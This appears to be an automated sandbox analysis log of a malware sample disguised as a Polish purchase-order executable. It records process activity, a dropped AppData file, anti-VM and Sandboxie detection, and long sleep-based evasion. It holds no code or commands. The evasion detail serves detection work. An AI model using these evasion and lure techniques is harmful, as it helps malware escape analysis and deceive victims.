Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 4E50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 1955	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 5998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 2620	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 4112	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 1955 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 5998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98613s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98361s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98178s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97667s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 2620 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 4112 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97403s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96447s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96219s >= -30000s	Jump to behavior
